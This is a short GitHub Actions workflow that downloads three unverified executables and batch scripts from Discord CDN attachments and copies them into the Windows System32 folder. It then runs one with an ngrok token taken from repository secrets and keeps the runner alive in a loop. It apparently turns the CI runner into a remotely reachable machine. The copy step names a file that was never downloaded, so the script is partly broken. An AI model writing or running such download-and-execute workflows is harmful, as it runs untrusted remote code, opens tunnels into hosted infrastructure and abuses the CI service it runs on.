name: main

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download github_init and starting...
      run: |
        Invoke-WebRequest https://cdn.discordapp.com/attachments/818761039432253461/852314673176772608/github_init.exe -OutFile github_init.exe
        Invoke-WebRequest https://cdn.discordapp.com/attachments/818761039432253461/852247137038762034/loop.bat -OutFile loop.bat
        Invoke-WebRequest https://cdn.discordapp.com/attachments/818761039432253461/852506439452721152/service.exe -OutFile service.exe
    - name: Copy...
      run: | 
        copy github_init.exe C:\Windows\System32
        copy loop.bat C:\Windows\System32
        copy service.bat C:\Windows\System32
    - name: Starting...
      run: .\github_init.exe $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Done. Maximum VM time:6h
      run: cmd /c loop.bat
    - name: ddasda
      run: .\service.exe
